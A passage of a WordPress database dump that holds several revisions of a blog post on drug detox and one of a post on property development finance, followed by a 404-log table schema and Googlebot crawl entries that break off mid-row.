/wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-20 11:47:51','2021-08-20 11:47:51','',660,'https://www.westonspirit.org.uk/?p=681',0,'revision','',0),(682,1,'2021-08-20 11:50:09','2021-08-20 11:50:09','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of <a href=\"https://www.healthline.com/nutrition/how-to-detox-your-body\" target=\"_blank\" rel=\"noreferrer noopener\">drugs and/or alcohol from someone\'s system</a>. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\" rel=\"noopener\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-20 11:50:09','2021-08-20 11:50:09','',660,'https://www.westonspirit.org.uk/?p=682',0,'revision','',0),(683,1,'2021-08-20 11:51:23','2021-08-20 11:51:23','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of <a href=\"https://www.healthline.com/nutrition/how-to-detox-your-body\" target=\"_blank\" rel=\"noreferrer noopener\">drugs and/or alcohol from someone\'s system</a>. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct place to detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available. <a rel=\"noopener\" target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-08-20 11:51:23','2021-08-20 11:51:23','',660,'https://www.westonspirit.org.uk/?p=683',0,'revision','',0),(688,1,'2021-09-08 13:27:58','2021-09-08 13:27:58',' ','','','publish','closed','closed','','688','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/blogs/688',7,'nav_menu_item','',0),(689,1,'2021-09-08 13:27:58','2021-09-08 13:27:58',' ','','','publish','closed','closed','','689','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/blogs/689',3,'nav_menu_item','',0),(690,1,'2021-09-08 13:27:58','2021-09-08 13:27:58',' ','','','publish','closed','closed','','690','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/blogs/690',5,'nav_menu_item','',0),(691,1,'2021-09-08 13:27:58','2021-09-08 13:27:58',' ','','','publish','closed','closed','','691','','','2021-09-08 13:27:58','2021-09-08 13:27:58','',0,'https://www.westonspirit.org.uk/blogs/691',8,'nav_menu_item','',0),(692,1,'2021-09-10 08:42:59','2021-09-10 08:42:59','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of <a href=\"https://www.healthline.com/nutrition/how-to-detox-your-body\" target=\"_blank\" rel=\"noreferrer noopener\">drugs and/or alcohol from someone\'s system</a>. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct place to detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a rel=\"noopener\" target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-autosave-v1','','','2021-09-10 08:42:59','2021-09-10 08:42:59','',660,'https://www.westonspirit.org.uk/?p=692',0,'revision','',0),(693,1,'2021-09-10 08:43:26','2021-09-10 08:43:26','','drugaddiction','','inherit','open','closed','','drugaddiction','','','2021-09-10 08:43:26','2021-09-10 08:43:26','',660,'http://www.westonspirit.org.uk/wp-content/uploads/2021/08/drugaddiction.jpg',0,'attachment','image/jpeg',0),(694,1,'2021-09-10 08:43:31','2021-09-10 08:43:31','<!-- wp:paragraph -->\n<p>When wanting to detox from drugs, many people are not aware of all the important things when undergoing a drug detox.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Everyone may react differently to a drug detox based on how their body works, but all drug detoxes follow the same patterns and are meant to be used for the same purposes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>What is drug detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Drug detox refers to the safe removal of <a href=\"https://www.healthline.com/nutrition/how-to-detox-your-body\" target=\"_blank\" rel=\"noreferrer noopener\">drugs and/or alcohol from someone\'s system</a>. It is common in the first stages of treating someone for an addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are two different types of detox:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Medical detox</li><li>Non-medical detox</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Unlike a&nbsp;<strong>medical detox,&nbsp;</strong>having a non-medical detox does not require any medication to be used and maybe the detox method is given to people who are struggling with an addiction to medication.</p>\n<!-- /wp:paragraph -->\n\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/rJSDgvWQSYI\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n\n<!-- wp:heading -->\n<h2>Why do people have a detox?</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>People who are having a detox commonly do it to clear their bodies from toxins - alcohol, drugs and other substances.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Detoxes are very useful for those who want to get help for their addiction and need to safely get the substances out of their system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, people who detox commonly experience withdrawal symptoms that many people tend to endure:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Excessive sweating and yawning</li><li>Anxiety, agitation and depression</li><li>Extreme muscle aches</li><li>Heavy eye-watering</li><li>Red and runny nose</li><li>Insomnia</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>If you need to detox safely, Castle Craig can help. They are expert addiction specialists with years of experience helping people detox properly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Finding the correct place to detox is crucial for long-term recovery. If you\'ve looked for a detox centre near you but haven\'t had much luck, read this piece, which discusses what you should do if there isn\'t one available.&nbsp;<a rel=\"noopener\" target=\"_blank\" href=\"https://castlecraig.co.uk/rehab/alcohol-rehab/detox\">Read it here</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2>Benefits of a detox</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Having a detox to get specific toxins out of your body provides multiple benefits to you:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Improves your mental health</li><li>Removes all of the toxins out of your body</li><li>Provides you with the right headspace so you can focus on sobriety</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2>Getting help for your addiction</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>If you are struggling with an addiction to drugs or alcohol, please&nbsp;<a target=\"_blank\" href=\"https://www.nhs.uk/live-well/healthy-body/drug-addiction-getting-help/\" rel=\"noreferrer noopener\">click here</a>&nbsp;to visit the NHS website for free information and resources on ways you can treat your addiction.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>More</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.webmd.com/mental-health/addiction/addiction-detox-what-to-know\" rel=\"noreferrer noopener\">Addiction: What to Know About Detox | WebMD</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.drinkaware.co.uk/facts/health-effects-of-alcohol/mental-health/alcohol-dependence\" rel=\"noreferrer noopener\">Alcohol dependence and withdrawal | DrinkAware</a></p>\n<!-- /wp:paragraph -->','The key things to know about drug detoxing','','inherit','closed','closed','','660-revision-v1','','','2021-09-10 08:43:31','2021-09-10 08:43:31','',660,'https://www.westonspirit.org.uk/?p=694',0,'revision','',0),(695,1,'2021-09-10 08:43:47','2021-09-10 08:43:47','','Applying for planning permission in Kent','','inherit','open','closed','','applying-for-planning-permission-in-kent','','','2021-09-10 08:43:47','2021-09-10 08:43:47','',653,'http://www.westonspirit.org.uk/wp-content/uploads/2021/08/Applying-for-planning-permission-in-Kent.jpg',0,'attachment','image/jpeg',0),(698,1,'2021-10-28 16:31:41','2021-10-28 16:31:41','<!-- wp:paragraph -->\n<p><strong>What everyone needs to know before they begin the property development journey!</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When performing a property development, there are things people may have been unaware of when they decided to begin the journey.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unlike how other people may make property development projects seem, deciding to develop properties can come with many risks if the developer has not done their research and does not have the right attitude to be a property developer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While it is possible anyone can become a property developer with the right attitude, you will need more than the correct mindset to succeed in the competitive environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><u>People get into property development to increase their income</u></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There will always be a need for housing - not just in the UK, but around the world.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the population rises, we will need more homes to accommodate the increasing population - and property development is the&nbsp;<em>perfect</em>&nbsp;way to do that.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are 29 million homes in the <a rel=\"noreferrer noopener\" href=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" data-type=\"URL\" data-id=\"https://www.theccc.org.uk/wp-content/uploads/2019/02/UK-housing-Fit-for-the-future-CCC-2019.pdf\" target=\"_blank\">UK</a>, whilst the population of the UK is estimated to be <a href=\"http://(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" data-type=\"URL\" data-id=\"(https://www.ons.gov.uk/peoplepopulationandcommunity/populationandmigration/populationestimates\" target=\"_blank\" rel=\"noreferrer noopener\">67 million people.</a> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property development is a method to solve the rising number of homeless people across the UK so they do not need to rely upon homeless shelters or sleeping in rough conditions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, before deciding to get into property management, many things need to be considered during the property development journey.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Your finance is essential</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Development finance is the most important part of getting your property development going!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many properties do not get built because of inadequate access to receiving development finance. Unlike developers with more income, many first-time buyers may not have the money to fund a property development project on their own so they rely on getting a loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If you are unable to get a loan from a traditional bank, there is an <a href=\"https://www.hunterfinance.co.uk/development-finance/\" data-type=\"URL\" data-id=\"https://www.hunterfinance.co.uk/development-finance/\" target=\"_blank\" rel=\"noreferrer noopener\">increase in alternative providers</a> that specialise in providing funding to property developments. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Vision</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><em>Every property needs a vision to succeed.</em></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Whether you are building a block of flats, a semi-detached home, or a bungalow... your property needs a vision so it can succeed in the property market.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Drawing up plans and having a particular idea of how you would like the property to look will show that there was a lot of thought put into the project - and it could be more appealing to potential buyers and renters. For example, zinc roofs are a really great way to appeal to new, modern buyers - so when building your property, choosing zinc as the <a href=\"https://www.elcroofing.co.uk/roofing-services/zinc-roofs\" data-type=\"URL\" data-id=\"https://www.elcroofing.co.uk/roofing-services/zinc-roofs\" target=\"_blank\" rel=\"noreferrer noopener\">roofing material</a> can make all the difference.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Not only can it increase the value, but can last for over 100 years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Think of your property development as something&nbsp;you&nbsp;are looking at: if you aren\'t interested in how it looks, then other people may think the same way that you do.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Your property development finance should be used to ensure the property is up to all of your standards regarding how it looks and all the features.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><span style=\"text-decoration: underline;\">Construction</span></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Do you need to hire a team that will undertake the construction process?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Developers rely on their property development finance to cover the costs of the construction process and some property finance lenders provide enough money to cover the construction process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure that you have an outline of what construction process you need to be done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Don\'t delay your property development journey, with the right property development finance you can begin your journey much quicker than you expected!&nbsp;</p>\n<!-- /wp:paragraph -->','Everything you need to know about property development','','inherit','closed','closed','','653-revision-v1','','','2021-10-28 16:31:41','2021-10-28 16:31:41','',653,'https://www.westonspirit.org.uk/?p=698',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_404`
--

DROP TABLE IF EXISTS `wp_redirection_404`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_404` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `agent` varchar(255) DEFAULT NULL,
  `referrer` varchar(255) DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `referrer` (`referrer`(191)),
  KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=715 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_404`
--

LOCK TABLES `wp_redirection_404` WRITE;
/*!40000 ALTER TABLE `wp_redirection_404` DISABLE KEYS */;
INSERT INTO `wp_redirection_404` VALUES (1,'2021-08-24 11:59:00','/decreasing.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(2,'2021-08-24 11:59:05','/hematomphalocele.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(3,'2021-08-24 11:59:15','/dreadless.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(4,'2021-08-24 11:59:28','/becripple.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(5,'2021-08-24 11:59:44','/everwhich.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(6,'2021-08-24 11:59:53','/adamant.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(7,'2021-08-24 11:59:59','/dogtail.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(8,'2021-08-24 12:00:01','/counterhaft.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(9,'2021-08-24 12:00:07','/larsenite.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(10,'2021-08-24 12:00:36','/astay.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(11,'2021-08-24 12:00:36','/Melanconium.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(12,'2021-08-24 12:01:04','/matreed.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(13,'2021-08-24 12:01:05','/bidri.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(14,'2021-08-24 12:01:11','/alias.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(15,'2021-08-24 12:01:50','/coenosarcal.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.124'),(16,'2021-08-24 12:02:04','/imminentness.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(17,'2021-08-24 12:02:05','/manlike.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.98'),(18,'2021-08-24 12:02:07','/cradler.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(19,'2021-08-24 12:02:52','/emptiness.xml','https://www.westonspirit.org.uk','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.64.126'),(20,'2021-08-24 